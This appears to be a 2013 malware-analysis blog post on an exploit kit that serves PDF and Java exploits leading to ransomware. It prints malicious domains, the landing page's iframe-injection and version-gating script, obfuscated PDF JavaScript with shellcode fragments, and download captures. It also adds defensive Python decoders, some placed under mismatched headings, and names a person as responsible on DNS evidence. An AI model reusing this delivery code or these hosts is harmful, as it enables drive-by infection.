This investigation was done over two days, scattered across our Twitter since there were only a few minutes to spare within daily work; by request I dared myself to gather the documentation and put it into this post. So here we go!
It starts with the two infector URLs, both pointing to IP 217.23.6.57:

afgarcia67.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070
davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070

These are the domain names possibly used by this EK infector:

hhmarshall1971.net
marshallfred26.net
afgarcia67.net
martinkashley87.net
davidsonfrc89.net
rosettasgiantonio9.net

We fetched it as per below:

```
=> `lavaafly.php@janeoleg=875070'
Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
Caching davidsonfrc89.net => 217.23.6.57
Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
:
GET /Jdowu32ds2s/lavaafly.php?janeoleg=875070 HTTP/1.0
User-Agent: #MalwareMustDie Playing with your jars
Accept: */*
Host: davidsonfrc89.net
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 07:30:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
:
200 OK
URI content encoding = `UTF-8'
Length: unspecified [text/html]
Saving to: `lavaafly.php?janeoleg=875070'
2013-01-08 16:30:35 (33.6 KB/s) - `lavaafly.php?janeoleg=875070' saved [29766]
```

This ends up with the landing page of this exploit kit. We neutralized the code here for analysis purposes -->>[PASTEBIN]

Landing Page Script Structure
As we always mention, it is important to recognize the structure of a landing page's script. The current one has the following layout:

```html
// first applet with jar download..
<applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1">
  <param name="bhjwfffiorjwe" value="0jfX19NXhX1...CgjC0.Ch3B2lCjZdp">
</applet>
// second applet with jar download..
<applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1">
  <param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt.../hkgjNZVkgp">
</applet>
// some html..
<html><body></body>
// a customized PluginDetect script, named "actojack", that gates the PDF exploit..
<script type="text/javascript">
var actojack = {
  version: "ruptable",
  name: "actojack",
  handler: function(c, b, a) { return function() { c(b, a) } },
  isDefined: function(b) { return typeof b != "undefined"
  :
  :
pdfver = actojack.getVersion("AdobeReader");
if (typeof pdfver == "string") {
  pdfver = pdfver.split(",");
  pdfver[3] = pdfver[3].substring(0, 1);
  pdfver = parseInt(pdfver.join(""), 10);
} else {
  pdfver = 0;
}
function ifr(abc) {
  var dh = document.createElement("iframe");
  dh.setAttribute("width", 1);
  dh.setAttribute("height", 1);
  dh.setAttribute("src", abc);
  document.body.appendChild(dh);
};
function pdf() {
  try {
    if ((pdfver >= 8000 && pdfver <= 8200) || (pdfver >= 9000 && pdfver <= 9301)) {
      ifr("lacecape.php");
    }
  } catch (e) { }
}
setTimeout(pdf, 2110);
```

There is one PDF exploit and two JAR infector downloads in the landing page. No obfuscation is used, just minified code. Note how the PDF is gated: PluginDetect reports the Adobe Reader version as a comma-separated string (for example "9,3,0,0"); the script cuts the fourth field to one character, concatenates the fields and parses the result as an integer, so "9,3,0,0" becomes 9300. The iframe is only injected, after a 2.1-second delay, when that number falls in 8000-8200 or 9000-9301, i.e. Reader 8.0 through 8.2.0 and 9.0 through 9.3.0. Those are exactly the versions fixed by Adobe's APSB10-07 update (8.2.1 / 9.3.1), which matches the CVE-2010-0188 exploit identified in the PDF below; a patched Reader never sees the PDF at all.

PDF Exploit
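To make the structure above actionable, here is a small triage helper. It is an added example, not code from the original post or the kit: it pulls the applet archives and `<param>` values out of an HTML snippet, finds the iframe targets that `ifr()` would inject, and replicates the Reader version gate from `pdf()` so you can see which Reader builds would receive the PDF. The `SAMPLE_HTML` is constructed to mirror the landing page's layout with the parameter values shortened.

```python
"""Triage helper for the landing page above. This is an added example, not the
original post's code: it pulls applet archives and <param> values out of an HTML
snippet, finds the iframe targets built by ifr(), and replicates the Adobe Reader
version gate from pdf() so you can see which Reader builds would receive the PDF."""
import re
from html.parser import HTMLParser


class AppletExtractor(HTMLParser):
    """Collect every <applet> with its code/archive and the <param> values inside."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "applet":
            self._current = {"code": a.get("code"), "archive": a.get("archive"), "params": {}}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name")] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None


def extract_applets(html):
    parser = AppletExtractor()
    parser.feed(html)
    return parser.applets


def extract_iframe_targets(html):
    """The kit injects the iframe from script, so the target only shows up as ifr("...")."""
    return re.findall(r'ifr\("([^"]+)"\)', html)


def reader_version_to_int(version):
    """Same transformation as the landing page: PluginDetect reports the Reader
    version as "major,minor,rev,build"; the build is cut to one character and the
    four fields are concatenated, so "9,3,0,0" -> 9300. Anything else -> 0."""
    if not isinstance(version, str):
        return 0
    parts = version.split(",")
    if len(parts) != 4:
        return 0
    parts[3] = parts[3][:1]
    try:
        return int("".join(parts), 10)
    except ValueError:
        return 0


def pdf_would_be_served(version):
    """True when pdf() would inject the lacecape.php iframe for this version string:
    8.0.0 to 8.2.0 and 9.0.0 to 9.3.0.x, i.e. Reader builds before the APSB10-07 fix."""
    v = reader_version_to_int(version)
    return (8000 <= v <= 8200) or (9000 <= v <= 9301)


# Constructed sample mirroring the landing page's layout; the applet/param names
# are the ones shown in the post, the param values are shortened.
SAMPLE_HTML = """
<applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1">
<param name="bhjwfffiorjwe" value="0jfX19NXhX1...CgjC0.Ch3B2lCjZdp">
</applet>
<applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1">
<param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt.../hkgjNZVkgp">
</applet>
<html><body></body>
<script type="text/javascript">
function pdf(){try{if((pdfver>=8000&&pdfver<=8200)||(pdfver>=9000&&pdfver<=9301)){ifr("lacecape.php");}}catch(e){}}
setTimeout(pdf,2110);
</script>
"""


def triage(html):
    """One-shot summary: jar paths, param lengths, iframe targets."""
    applets = extract_applets(html)
    return {
        "jars": [a["archive"] for a in applets],
        "param_lengths": {k: len(v) for a in applets for k, v in a["params"].items()},
        "iframes": extract_iframe_targets(html),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_HTML))
    for ver in ("9,3,0,0", "9,3,1,0", "8,2,0,0", "8,2,1,0", "10,1,0,0"):
        print(ver, "targeted" if pdf_would_be_served(ver) else "skipped")
```

Running it against a real landing page gives you the jar paths and iframe targets to block, and `pdf_would_be_served()` tells you whether a given Reader build on the victim side would even have been offered the PDF.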
Here's the function for downloading the PDF via IFRAME:

```javascript
:
function ifr(abc) {
  var dh = document.createElement("iframe");
  dh.setAttribute("width", 1);
  dh.setAttribute("height", 1);
  dh.setAttribute("src", abc);
  document.body.appendChild(dh);
};
:
```

It is called by the function pdf() below:

```javascript
function pdf() {
  try {
    if ((pdfver >= 8000 && pdfver <= 8200) || (pdfver >= 9000 && pdfver <= 9301)) {
      ifr("lacecape.php");
```

The PDF download path is self-explanatory in the code, go figure :-) Both functions are located at the end of the script. The PDF itself carries its script at offsets 0x415-0x144A, with the structure below:

```javascript
// variable settings..
ozsmpkoqb="affsdfsa";
var oazgntrlz = "tw%kf";
ivtwcjqa=event.target;
vjbvirqrz=this.w[ivtwcjqa.info.Date];
// obfuscation pattern under a string in a function...
function cskfhyrah(){return("q1ggh55jre..jre0Aq1ggh55jre7Dq1ggh55jre0A")}
// deobfuscation generator...
vjbvirqrz("ddyoxazmq=cskfhyrah().repl"+"a"+"ce(/q1ggh55jre/g,oazgntrlz.charAt(2));");
bpzritaa=ddyoxazmq;
vjbvirqrz(unescape(bpzritaa));
/*----end of structure----*/
```

```
// additional: obfuscation pattern :
q1ggh55jre2Bq1ggh55jre58q1ggh55jre6Eq1ggh55jre51q1ggh55jre
h55jre42q1ggh55jre63q1ggh55jre69q1ggh55jre2Fq1ggh55jre76q1
re37q1ggh55jre79q1ggh55jre35q1ggh55jre76q1ggh55jre4Cq1ggh5
q1ggh55jre38q1ggh55jre37q1ggh55jre2Bq1ggh55jre74q1ggh55jre
h55jre62q1ggh55jre49q1ggh55jre43q1ggh55jre36q1ggh55jre77q1
re4Dq1ggh55jre6Dq1ggh55jre69q1ggh55jre56q1ggh55jre77q1ggh5
q1ggh55jre2Bq1ggh55jre76q1ggh55jre4Cq1ggh55jre7Aq1ggh55jre
h55jre4Bq1ggh55jre6Cq1ggh55jre63q1ggh55jre34q1ggh55jre36q1
```

Note that the obfuscated data is hidden inside a function's return value to defeat automated extraction, and that the pattern is a repetition of the marker string "q1ggh55jre". Two more anti-automation tricks are visible: the function that runs each decoded stage (vjbvirqrz) is looked up indirectly through a value taken from the document's Info dictionary (ivtwcjqa.info.Date), and the method name "replace" is assembled from fragments ("repl"+"a"+"ce"). The first decoding step is the line below:

```javascript
vjbvirqrz("ddyoxazmq=cskfhyrah().repl"+"a"+"ce(/q1ggh55jre/g,oazgntrlz.charAt(2));");
```

oazgntrlz.charAt(2) is "%" (the third character of "tw%kf"), so every "q1ggh55jreXX" becomes a "%XX" escape and unescape() yields the second-stage script; the pattern fragment quoted above decodes to "+XnQ", which you can see inside the payload string below. This burps out the other obfuscated script, and if you run it down you'll see the strings below:

```
gwvtcewuw = "SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
:
xe5HAMAAIs0JIn3VoA+XnQGrDS8quL6w+jk////4jHKqFTmvby8
Bci/vLw1e08YQ1wxDLS/vLxU+L28vCsxI7y5vLzWtuHxszgsvLy
86utU1728vNQ8vry87+tUhL28vDl8yL5XXNTdPWVzVA6+vLxDbI
C6wKRUz728vIG8nLy8wbDvVBG8vLw5fMmiVwTvVNi8vLw5fMmuj
XzYN/ykN/yIgVi+vLzIZlcg6zVL1kPljXxAThIr4zyEvMi/Klc4
64181kPlQE7aE3v7Qoe8jbzj1Dy+vLzv61QHvLy81E5nyBFUO72
8vNQk0/OB7FQKvby81rzWQkNs6TVZ1ujllXDcMcCYnOuNfE8W4z
HLrNb4M7qNZ9Q0Qg+qVLi+vLzr6u/v7+/v7+9DybRDbDX4mKDddX
:
```

↑ The string contains the exploit and the shellcode infector. We manually decoded this PDF infector here -->>[PASTEBIN]. By the way it exploits, we recognize that LibTIFF CVE-2010-0188 is used. A quick check confirms the shape: the base64 prefix "SUkqAD" decodes to 49 49 2A 00, the little-endian TIFF magic, and the long run of "kJCQ" is base64 for repeated 0x90 bytes, i.e. a NOP sled directly after the TIFF header. That is what a CVE-2010-0188 trigger looks like (the TIFF parsing overflow in Adobe Reader 8.x before 8.2.1 and 9.x before 9.3.1), and it matches the Reader versions gated by the landing page. The PoC of the malware download via this infector PDF:

```
GET /Jdowu32ds2s/janudent.php HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_04
Host: davidsonfrc89.net
:
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Mon, 07 Jan 2013 07:13:48 GMT
Content-Type: application/x-msdownload
Content-Length: 81136
Connection: keep-alive
Pragma: public
Expires: Mon, 07 Jan 2013 07:13:48 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="0959c.exe"
Content-Transfer-Encoding: binary

MZ......................@........................
.......................!..L.!This program cannot be run in DOS mode.
```

Note the User-Agent on this request is the one the Java plugin sends (Java/1.7.0_04, a build that is vulnerable to both JAR exploits covered next).

The JAR Exploits
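The two decoding steps described above can be scripted. The block below is an added example, not code from the original post or from the PDF: `stage1()` performs the marker-to-"%" substitution and a JavaScript-compatible `unescape()`, and `analyse_blob()` base64-decodes the carrier string and checks for the TIFF magic plus NOP sled. `PAGE_FRAGMENT` is the first four units of the pattern quoted in the post; `SAMPLE_OBFUSCATED` is a constructed encoding of the stage-2 line `gwvtcewuw = "SUkqADggAACQkJCQkJCQ";` (the real base64 prefix from the post, truncated after the sled starts), built the way `cskfhyrah()` carries it.

```python
"""Decoder for the PDF's two-stage JavaScript obfuscation. This is an added
example, not the original post's code: stage 1 is the marker-to-"%"
substitution followed by JavaScript's unescape(), stage 2 pulls the base64
literal (gwvtcewuw in the sample) out of the decoded script and checks whether
it is a TIFF with a NOP sled, the shape of a CVE-2010-0188 trigger."""
import base64
import re

MARKER = "q1ggh55jre"   # the repeated pattern seen in cskfhyrah()
KEY_STRING = "tw%kf"    # oazgntrlz in the sample; charAt(2) is "%"


def js_unescape(s):
    """Python equivalent of JavaScript's legacy unescape(): %XX and %uXXXX."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, s)


def stage1(obfuscated, marker=MARKER, key=KEY_STRING):
    """cskfhyrah().replace(/q1ggh55jre/g, oazgntrlz.charAt(2)), then unescape()."""
    return js_unescape(obfuscated.replace(marker, key[2]))


def extract_base64_literals(script, min_len=16):
    """Quoted string literals that look like base64 (the payload carrier)."""
    return re.findall(r'"([A-Za-z0-9+/]{%d,}={0,2})"' % min_len, script)


def analyse_blob(b64):
    """Decode one literal and classify it: TIFF magic plus a run of 0x90 NOPs
    right after the 8-byte header is what the exploit TIFF looks like."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    is_tiff = raw[:4] in (b"II*\x00", b"MM\x00*")
    nops = 0
    if is_tiff:
        i = 8                      # 4-byte magic + 4-byte offset of the first IFD
        while i < len(raw) and raw[i] == 0x90:
            nops += 1
            i += 1
    return {"size": len(raw), "is_tiff": is_tiff, "leading_nops": nops}


def decode_pdf_script(obfuscated):
    """Full pipeline: returns the stage-2 script and an analysis of each literal."""
    script = stage1(obfuscated)
    return script, [analyse_blob(b) for b in extract_base64_literals(script)]


# The first four units of the pattern quoted in the post: they decode to "+XnQ".
PAGE_FRAGMENT = "q1ggh55jre2Bq1ggh55jre58q1ggh55jre6Eq1ggh55jre51"

# Constructed sample: the stage-2 line  gwvtcewuw = "SUkqADggAACQkJCQkJCQ";
# encoded the way cskfhyrah() carries it (every byte as MARKER + two hex digits).
# The base64 is the real prefix from the post, truncated after the NOP sled starts.
SAMPLE_OBFUSCATED = (
    "q1ggh55jre67q1ggh55jre77q1ggh55jre76q1ggh55jre74q1ggh55jre63"
    "q1ggh55jre65q1ggh55jre77q1ggh55jre75q1ggh55jre77q1ggh55jre20"
    "q1ggh55jre3Dq1ggh55jre20q1ggh55jre22q1ggh55jre53q1ggh55jre55"
    "q1ggh55jre6Bq1ggh55jre71q1ggh55jre41q1ggh55jre44q1ggh55jre67"
    "q1ggh55jre67q1ggh55jre41q1ggh55jre41q1ggh55jre43q1ggh55jre51"
    "q1ggh55jre6Bq1ggh55jre4Aq1ggh55jre43q1ggh55jre51q1ggh55jre6B"
    "q1ggh55jre4Aq1ggh55jre43q1ggh55jre51q1ggh55jre22q1ggh55jre3B"
)

if __name__ == "__main__":
    script, findings = decode_pdf_script(SAMPLE_OBFUSCATED)
    print(script)
    print(findings)
```

The marker and key string are parameters because this family rotates both per sample: read them off the `function ...(){return("...")}` and the `charAt()` argument in the PDF's script, then feed the return string to `stage1()`.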
Two applets were detected at the head of the landing page's code:

```html
<applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1">
<param name="bhjwfffiorjwe" value="0jfX19NXhX1MMX0ZltNjk9k/agtjNgs9hgZpBVthZX8.:jfg2.8/N/sljhaf0f/2lMBM9atrZag3Bd38oXfVNsB.fs0jC1BhtgeMZ/8j.30tajCCNNZtt9sX/0Ndga98shkk0CsCVN3VgB0gVkfs09kZi30MBdV..aNsfVftf3nV99fkgt2tBf/jas1.o2sXt2XtfnVh./hj8.itVfkaftCoC/30aCV399d/B1/3M.j8gBljBsn33h/khB9efZZglsj3thkNasMNg/j8.glXXtJZ8.CdXMNdt33ststhohXMZ/38dw92B8gl32u.8Zkg30g39BX21Xkl2lCXaXMjfdj8kC/aZ/s33sf280C2ZdMk9Cj3sd2/1jdaN/adltfB/kjNlNf/k3gaMhBk/8aknVt3/d.MjukXjZldVCdfs/dh2C1ekk3st.f0n.dCdkaZgtB120/Nhj.CjZ.al0jpjCgjC0.Ch3B2lCjZdp">
</applet>
<applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1">
<param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt0djf3j32t21/Z.M0.p1C3X3a/g:1h.ZM2Zs/t1Z/.g92/l0flsta8rV/gXth/1oV3dl0Vj1sM1VMlZjdesXffXhsdtfN1h2VlNtBfCf.8tgaB020sa3fsBkBsX0g8gdlka9jXhiBkVXtV/Cah1fZ9d1gnghX/t39jtt.f2d2k9o.2htZjV2nt/j2ktdXih1NgVfC0oj/NZ90j19NB9.8M98.gaVXa8lMnCC2f3ZtsegXCsd331tZ00hlZdN/N8aB1ktgJ980Vf09Vdjg2Zj0k1og3lNhft8wkaZ/dZf.uftCC0Mf/32lMl9C8k2N/V8dV0Md1kh/CC//sCBBh.8f22/131h132s0BV/dgh//XV3kj2s3jg0jgBXkNajljC8sMXn0lZ/N93tuM9d0CgCtdl8gVMBk0eVMfNB1tjn8Ndhflg0t3CMX.aXa.//0hN3akpfhV8l0s/hkgjNZVkgp">
</applet>
```

The long <param> value is data the applet class reads at runtime; its decoding is covered in the analysis guide linked below. We see two downloadable paths and fetch them:

```
GET /Jdowu32ds2s/rgerding/jimmdemy.jar HTTP/1.0
:
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 09:32:58 GMT
Content-Type: application/x-java-archive
Content-Length: 9465
Connection: keep-alive
Last-Modified: Sun, 30 Dec 2012 11:22:55 GMT
ETag: "39a0afc-24f9-4d2101e35e1c0"
Accept-Ranges: bytes
:
200 OK
Length: 9,465 (9.2K) [application/x-java-archive]
18:33:01 (27.40 KB/s) - `jimmdemy.jar' saved [9465/9465]

GET /Jdowu32ds2s/rgerding/torylane.jar HTTP/1.0
:
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 09:36:01 GMT
Content-Type: application/x-java-archive
Content-Length: 5502
Connection: keep-alive
Last-Modified: Tue, 25 Dec 2012 05:55:36 GMT
ETag: "39a0afd-157e-4d1a6f66da600"
Accept-Ranges: bytes
:
200 OK
Length: 5,502 (5.4K) [application/x-java-archive]
18:36:04 (18.70 KB/s) - `torylane.jar' saved [5502/5502]
```

These JARs contain exploits for CVE-2012-1723 (a HotSpot type-confusion bug, fixed by the June 2012 Java CPU in JRE 7u5 / 6u33) and CVE-2012-5076 (a JAX-WS sandbox bypass affecting Java 7 up to 7u7, fixed in 7u9 by the October 2012 CPU). The complete JAR exploit analysis guide is here --->>[PASTEBIN]

Payload
Through infection by this landing page you get exploited by either the PDF or the JARs and receive the same payload; the PDF network traffic below is the evidence:

```
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Mon, 07 Jan 2013 07:13:48 GMT
Content-Type: application/x-msdownload
Content-Length: 81136
Connection: keep-alive
Pragma: public
Expires: Mon, 07 Jan 2013 07:13:48 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="0959c.exe"
Content-Transfer-Encoding: binary

MZ......................@........................
.......................!..L.!This program cannot be run in DOS mode.
$.........;<..Uo..Uo..Uo..Fo..Uo.[.o..Uo..To!.Uo..Uo..Uo...o..Uo...o..
Uo...o..UoRich..Uo........................PE..L...LL.P................
. ..........p.
:
```

It is a PE binary file:

```
Sections:   VirtualAddress  VirtualSize  SizeOfRawData
  .text     0x1000          0x1e5a       8192
  .data     0x3000          0x7a14       31232
  .rsrc     0xb000          0x66d8       26624
  .reloc    0x12000         0x380        1024

Compilation timedatestamp.....: 2013-01-05 15:52:44
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001B70
```

```
0000  4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  MZ..............
0010  B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0030  00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00  ................
0040  0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ........!..L.!Th
0050  69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is program canno
0060  74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t be run in DOS
0070  6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00  mode....$.......
0080  C6 FC 3B 3C 82 9D 55 6F 82 9D 55 6F 82 9D 55 6F  ..;<..Uo..Uo..Uo
0090  0C 82 46 6F 81 9D 55 6F A5 5B 2E 6F 8D 9D 55 6F  ..Fo..Uo.[.o..Uo
00A0  82 9D 54 6F 21 9D 55 6F 82 9D 55 6F 83 9D 55 6F  ..To!.Uo..Uo..Uo
00B0  9C CF D6 6F 83 9D 55 6F 9C CF C1 6F 83 9D 55 6F  ...o..Uo...o..Uo
00C0  9C CF C4 6F 83 9D 55 6F 52 69 63 68 82 9D 55 6F  ...o..UoRich..Uo
00D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00E0  00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00  ........PE..L...
00F0  4C 4C E8 50 00 00 00 00 00 00 00 00 E0 00 02 01  LL.P............
:
:
```

↑ Hello Ransomware! Please be careful if you test this sample. The dump alone already confirms the figures above: e_lfanew at offset 0x3C is 0xE8, and the COFF header that follows the "PE\0\0" signature there reads Machine 0x014C, NumberOfSections 4 and TimeDateStamp 0x50E84C4C, which is 2013-01-05 15:52:44 UTC, two days before the first capture. The "DanS"..."Rich" block at 0x80-0xCF is an MSVC linker Rich header (XOR key 82 9D 55 6F), so this was built with Microsoft's toolchain rather than hand-packed. If we check it on VirusTotal further:

```
SHA256:          57d2f97502f161d290e6300c74b36ba1c7e0de914fc7d6dec4e55d763841be2f
SHA1:            311360a772cdcd942f3fc7696e739e941be5d4ec
MD5:             fba8bbf5b9a6079ace6621b879aec31a
File size:       79.2 KB ( 81136 bytes )
File name:       ifgxpers.exevr
File type:       Win32 EXE
Tags:            peexe
Detection ratio: 10 / 44
Analysis date:   2013-01-07 23:11:44 UTC ( 1 day, 11 hours ago )
```

URL -->>[VirusTotal]

With malware names:

```
DrWeb                : Trojan.MulDrop4.20350
TrendMicro           : HS_RANSDIGI.SM
TrendMicro-HouseCall : TROJ_GEN.F47V0107
Emsisoft             : Trojan.Win32.Agent.AMN (A)
Kaspersky            : Trojan-Ransom.Win32.Blocker.agrk
Malwarebytes         : Trojan.FakeMS
ViRobot              : Trojan.Win32.A.Blocker.81136
Panda                : Trj/Ransom.AB
SUPERAntiSpyware     : Trojan.Agent/Gen-Kryptic
Comodo               : TrojWare.Win32.Trojan.Agent.Gen
```

Research & Samples
The samples & capture data are shared here --->>[MEDIAFIRE]

VirusTotal detection ratio of the overall samples:

```
File's Time-Stamp   Size    Name          Ratio      MD5
------------------------------------------------------------------------------
2013/01/09 19:08    81,136  0959c.exe     VT(23/46)  fba8bbf5b9a6079ace6621b879aec31a
2013/01/08 15:25     5,612  janudent.pdf  VT(7/46)   ed7c9c976ac0f3399c6928ddad43b739
2012/12/30 20:22     9,465  jimmdemy.jar  VT(7/46)   be2bcd6c3f2aee6432358e1fb37a8dc2
2012/12/25 14:55     5,502  torylane.jar  VT(1/46)   ae66fc69244abec22f20384356806ad2
2013/01/08 16:30    29,766  lavaafly.php  VT(1/46)   6305989da0c9ac0f4c1fd138b22d634e
```

Some crime investigation & evidence
We're sure that the person behind this ID, davidsonfrc89@yahoo.com, is responsible. The address is the SOA "responsible mail addr" (RNAME) of both zones, i.e. a value set by whoever operates the zones at topdns.me, so it ties the domains to one operator. Note also that both zones carry the identical serial 1357651830 (a Unix timestamp, 2013-01-08 13:30:30 UTC, the same day as the landing page fetch above) and resolve to 217.23.6.56, one address away from the 217.23.6.57 that served the landing page.

```
> davidsonfrc89.net
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

davidsonfrc89.net
        primary name server = ns1.topdns.me
        responsible mail addr = davidsonfrc89@yahoo.com
        serial  = 1357651830
        refresh = 10800 (3 hours)
        retry   = 3600 (1 hour)
        expire  = 432000 (5 days)
        default TTL = 38400 (10 hours 40 mins)
davidsonfrc89.net       nameserver = ns1.topdns.me
davidsonfrc89.net       nameserver = ns2.topdns.me
davidsonfrc89.net       internet address = 217.23.6.56
>
>
> afgarcia67.net
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

afgarcia67.net
        primary name server = ns1.topdns.me
        responsible mail addr = davidsonfrc89@yahoo.com
        serial  = 1357651830
        refresh = 10800 (3 hours)
        retry   = 3600 (1 hour)
        expire  = 432000 (5 days)
        default TTL = 38400 (10 hours 40 mins)
afgarcia67.net  nameserver = ns1.topdns.me
afgarcia67.net  nameserver = ns2.topdns.me
afgarcia67.net  internet address = 217.23.6.56
```
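The pivot done by hand above (same RNAME, same serial, same address) scales to a longer domain list if you script it. The block below is an added example, not code from the original post: it parses nslookup-style output into per-domain records, clusters domains whose SOA shares a responsible address and serial, and converts an epoch-style serial into a UTC date while refusing to misread a YYYYMMDDnn serial as a timestamp. `NSLOOKUP_OUTPUT` is transcribed from the session in the post.

```python
"""Pivot over the nslookup output above. This is an added example, not the
original post's code: it parses each queried domain's SOA, NS and A answers,
groups domains that share the same responsible mail address and zone serial,
and converts an epoch-style serial to a UTC date."""
import re
from collections import defaultdict
from datetime import datetime, timezone

# Transcribed from the nslookup session in the post.
NSLOOKUP_OUTPUT = """\
> davidsonfrc89.net
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

davidsonfrc89.net
        primary name server = ns1.topdns.me
        responsible mail addr = davidsonfrc89@yahoo.com
        serial  = 1357651830
        refresh = 10800 (3 hours)
        retry   = 3600 (1 hour)
        expire  = 432000 (5 days)
        default TTL = 38400 (10 hours 40 mins)
davidsonfrc89.net       nameserver = ns1.topdns.me
davidsonfrc89.net       nameserver = ns2.topdns.me
davidsonfrc89.net       internet address = 217.23.6.56
>
> afgarcia67.net
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

afgarcia67.net
        primary name server = ns1.topdns.me
        responsible mail addr = davidsonfrc89@yahoo.com
        serial  = 1357651830
        refresh = 10800 (3 hours)
        retry   = 3600 (1 hour)
        expire  = 432000 (5 days)
        default TTL = 38400 (10 hours 40 mins)
afgarcia67.net  nameserver = ns1.topdns.me
afgarcia67.net  nameserver = ns2.topdns.me
afgarcia67.net  internet address = 217.23.6.56
"""

FIELDS = {
    "primary_ns": re.compile(r"primary name server\s*=\s*(\S+)"),
    "rname": re.compile(r"responsible mail addr\s*=\s*(\S+)"),
    "serial": re.compile(r"serial\s*=\s*(\d+)"),
}
NS_RE = re.compile(r"nameserver\s*=\s*(\S+)")
A_RE = re.compile(r"internet address\s*=\s*(\S+)")


def parse_nslookup(text):
    """Return {domain: {primary_ns, rname, serial, nameservers, a}} keyed on the
    '> domain' prompt lines; bare '>' prompts are ignored."""
    records = {}
    current = None
    for line in text.splitlines():
        m = re.match(r">\s*(\S+)\s*$", line)
        if m:
            current = m.group(1)
            records[current] = {"nameservers": [], "a": []}
            continue
        if current is None:
            continue
        rec = records[current]
        for name, rx in FIELDS.items():
            m = rx.search(line)
            if m:
                rec[name] = int(m.group(1)) if name == "serial" else m.group(1)
        m = NS_RE.search(line)
        if m:
            rec["nameservers"].append(m.group(1))
        m = A_RE.search(line)
        if m:
            rec["a"].append(m.group(1))
    return records


def cluster_by_soa(records):
    """Group domains whose zones share RNAME and serial: same operator, same
    zone-generation run."""
    groups = defaultdict(list)
    for domain, rec in records.items():
        groups[(rec.get("rname"), rec.get("serial"))].append(domain)
    return {k: sorted(v) for k, v in groups.items()}


def serial_to_utc(serial):
    """Many hosters use the Unix time of the last zone build as the SOA serial.
    Return the UTC date if the value falls in a plausible epoch window (2000..2030),
    else None (e.g. a YYYYMMDDnn serial like 2013010801 is not a timestamp)."""
    if 946684800 <= serial <= 1893456000:
        return datetime.fromtimestamp(serial, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
    return None


if __name__ == "__main__":
    recs = parse_nslookup(NSLOOKUP_OUTPUT)
    for key, domains in cluster_by_soa(recs).items():
        print(key, serial_to_utc(key[1]), domains)
```

Feed it the nslookup output for the whole candidate list from the top of the post and the clusters show which of those domains sit in the same zone-generation batch under the same responsible address.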